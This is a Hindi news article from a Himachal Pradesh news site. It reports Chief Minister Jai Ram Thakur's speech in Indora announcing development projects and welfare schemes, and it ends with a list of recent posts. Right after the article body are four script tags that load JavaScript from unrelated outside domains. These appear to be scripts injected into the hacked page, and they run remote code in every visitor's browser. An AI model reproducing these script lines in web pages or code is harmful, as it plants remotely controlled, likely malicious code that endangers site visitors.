Categories: हिमाचल

शीतकालीन प्रवास के प्रथम चरण में तीन विधान सभा क्षेत्रों को 165 करोड़ रुपये की सौगातः मुख्यमंत्री

<p><br />
मुख्यमंत्री जयराम ठाकुर ने कहा कि कांगड़ा जिला के शीतकालीन प्रवास के प्रथम चरण में उन्होंने जिला के तीन विधान सभा क्षेत्रों में 165 करोड़ रुपये की विकासात्मक परियोजनाओं का लोकार्पण और शिलान्यास किए हैं। मुख्यमंत्री कांगड़ा जिला के इंदौरा विधान सभा क्षेत्र के अंतर्गत सूरजपुर में एक जनसभा को संबोधित कर रहे थे। उन्होंने इंदौरा विधान सभा क्षेत्र के लोगों के लिए 65 करोड़ रुपये की विकास परियोजनाओं का तोहफा दिया है। इसी प्रकार बैजनाथ और कांगड़ा विधान सभा क्षेत्रों के लिए भी 50-50 करोड़ रुपये की विकासात्मक परियोजनाएं की गई हैं। ये उन लोगों को एक जोरदार जवाब है, जो अनावश्यक और निराधार आरोप लगाकर लोगों को भ्रमित करने का प्रयास करते हैं। लेकिन प्रदेश की प्रबुद्ध जनता यह भली भांति समझती है कि उनका सच्चा हितैषी कौन है।<br />
&nbsp;<br />
जयराम ठाकुर ने कहा कि वर्तमान प्रदेश सरकार कांगड़ा जिला के समग्र विकास को शीर्ष प्राथमिकता दे रही है, क्योंकि यह प्रदेश का सबसे बड़ा जिला है। राज्य सरकार का एक वर्ष का कार्यकाल पूरा होने के अवसर पर धर्मशाला में समारोह आयोजित किया गया और उसके उपरांत यहां पर वैश्विक निवेशक सम्मेलन का भी आयोजन किया गया। इन दोनों प्रमुख समारोहों में प्रधानमंत्री नरेंद्र मोदी शामिल हुए थे। विपक्ष के नेता प्रदेश सरकार द्वारा आयोजित वैश्विक निवेशक सम्मेलन को लेकर सवाल पूछ रहे हैं। उन्होंने कांग्रेस पार्टी के नेताओं को स्मरण करवाया कि निवेश आकर्षित करने के लिए उन्होंने भी देशभर का दौरा किया, हालांकि हिमाचल प्रदेश में निवेशकों को लाने में उनके प्रयास पूरी तरह विफल हुए। इधर, वर्तमान सरकार 96 हजार करोड़ रुपये से अधिक निवेश के समझौता ज्ञापनों को हस्ताक्षरित करने में सफल रही है। इसके साथ ही राज्य सरकार के दो वर्ष का कार्यकाल पूरा होने के अवसर पर 13,400 करोड़ रुपये की परियोजनाओं का ग्राउंड ब्रेकिंग समारोह आयोजित किया गया।<br />
&nbsp;<br />
मुख्यमंत्री ने कहा कि वर्तमान प्रदेश सरकार का अभी तक का कार्यकाल सुशासन, विभिन्न क्षेत्रों में नवाचार और जन सेवाओं को समर्पित रहा है। सरकार की विभिन्न योजनाओं के प्रभावी कार्यान्वयन के कारण प्रदेश की जनता के जीवन में बड़ा बदलाव आया है। चारों लोकसभा चुनाव और दोनो विधान सभा उप चुनाव भाजपा ने रिकॉर्ड अंतर से जीते, जिससे यह साबित हो गया है कि प्रदेश की जनता ने सरकार की नीतियों एवं कार्यक्रमों को अपना पूरा सहयोग दिया है। उन्होंने कहा कि अपनी समस्याओं का समाधान करवाने में जनमंच लोगों के लिए वरदान साबित हो रहा है। इसके अतिरिक्त मुख्यमंत्री हेल्पलाईन-1100 भी आरंभ की गई है, जिसके माध्यम से कोई भी व्यक्ति फोन के माध्यम से अपनी शिकायत या समस्या दर्ज करवा सकता है। राज्य में हिमकेयर योजना आरंभ कर उन 22 लाख लोगों को लाभान्वित किया गया है, जो भारत सरकार की आयुष्मान भारत योजना का लाभ नहीं उठा पाए थे। राज्य सरकार ने सहारा योजना भी आरंभ की है, जिसके अंतर्गत उन परिवारों को 2000 रुपये प्रतिमाह की आर्थिक सहायता प्रदान की जा रही है, जिनके परिवार में कोई सदस्य गंभीर रूप से बीमार है। गृहिणी सुविधा योजना के माध्यम से हिमाचल प्रदेश देश का पहला धुआंरहित राज्य बन गया है।<br />
&nbsp;<br />
पुलवामा हमले के शहीदों को श्रद्धांजलि देते हुए मुख्यमंत्री ने कहा कि प्रधानमंत्री नरेंद्र मोदी के मजबूत नेतृत्व ने पाकिस्तान के जघन्य ईरादों को उचित जवाब देते हुए सर्जिकल स्ट्राईक के माध्यम से पाकिस्तान आतंकियों के प्रशिक्षण शिविरों को तबाह किया। जम्मू-कश्मीर से अनुच्छेद 370 का हटना केवल नरेंद्र मोदी के नेतृत्व के कारण संभव हो पाया।जयराम ठाकुर ने पालमपुर, ज्वालामुखी, जयसिंहपुर और ज्वाली विधान सभा क्षेत्रों में गौ-अभ्यारण्य स्थापित करने के लिए दो-दो करोड़ रुपये देने की घोषणा की।उन्होंने गंगथ सामुदायिक स्वास्थ्य केंद्र को नागरिक अस्पताल और तेवरा स्वास्थ्य उपकेंद्र को प्राथमिक स्वास्थ्य केंद्र के रूप में स्तरोन्नत करने की घोषणा की। उन्होंने कहा कि राजकीय वरिष्ठ माध्यमिक पाठशाला भरी-कन्दोरी में विज्ञान कक्षाएं और राजकीय महाविद्यालय इंदौरा में एमएससी की कक्षाएं शुरू की जाएंगी।<br />
&nbsp;<br />
मुख्यमंत्री ने क्षेत्र में विभिन्न सड़कों के निर्माण के लिए 1.50 करोड़ रुपये देने की घोषणा की। उन्होंने जसूर-गंगथ-इंदौरा सड़क निर्माण के लिए प्लाहघाट में आधारशिला रखी। इस सड़क का निर्माण 4.52 करोड़ रुपये से होगा, जिससे 15 गांवों के हजारों लोग लाभान्वित होंगे। उन्होंने 34.82 करोड़ रुपये की लागत से निर्मित की जाने वाली मल्टी विलेजिज पेयजल आपूर्ति योजना का इंदपुर में शिलान्यास किया। इस योजना से इंदौरा क्षेत्र के 80 गांवों को पेयजल सुविधा मिलेगी।उन्होंने इंदौरा में मिनी सचिवालय तथा इंदौरा से मण्ड मियाणी- पराल सड़क का शिलान्यास भी किया। उन्होंने बैण अतरियां में गौ सदन के स्तरोन्नयन की आधारशिला रखी। उन्होंने यहां पर बद्रीविशाल मंदिर में पूजा-अर्चना भी की।स्थानीय विधायक रीता धीमान ने क्षेत्र के विकास को गति प्रदान करने और करोड़ों रुपये की परियोजनाएं स्वीकृत करने के लिए मुख्यमंत्री का आभार व्यक्त किया।<br />
&nbsp;</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1581737135939″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

“JOA IT पदों पर चयनित उम्मीदवारों की सूची जारी, इतने को मिली नियुक्ति”

  Shimla: सामाजिक न्याय एवं अधिकारिता विभाग ने राज्य चयन आयोग की सिफारिशों के आधार…

3 hours ago

अतिक्रमण एक रात का नहीं, सुक्खू सरकार से पहले हुआ अवैध निर्माण: कुलदीप

  Shimla : हिमाचल प्रदेश में स्ट्रीट वेंडर्स को लेकर विधानसभा की ओर से कमेटी…

3 hours ago

मुख्यमंत्री के निर्देश पर हमीरपुर में ‘कायाकल्प’ अभियान से बदल रही है शहर की तस्वीर

  Hamirpur: मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू के गृह जिले के मुख्यालय हमीरपुर शहर की…

4 hours ago

राज्य के स्वास्थ्य ढांचे को मजबूत करने के लिए ठोस कदम उठा रही है सरकार: बाली

  टांडा मेडिकल कालेज भी स्वास्थ्य क्षेत्र में निरंतर नए आयाम कर रहा स्थापित विश्व…

4 hours ago

प्रमोशन लिस्ट के इंतजार में कई शिक्षक बिना प्रिंसिपल बने होंगे रिटायर

  वर्तमान में प्रिंसिपल के 500 पद है खाली लेक्चरर्स की 90:10 की मांग का…

5 hours ago

अनुष्का दत्ता पहुंची मिस यूनिवर्स इंडिया-2024 के फाइनल में, हिमाचल की पहली प्रतिभागी

  Shimla: रोह‍डू की रहने वाली 22 वर्षीय अनुष्का दत्ता मिस यूनिवर्स इंडिया 2024 प्रतियोगिता…

5 hours ago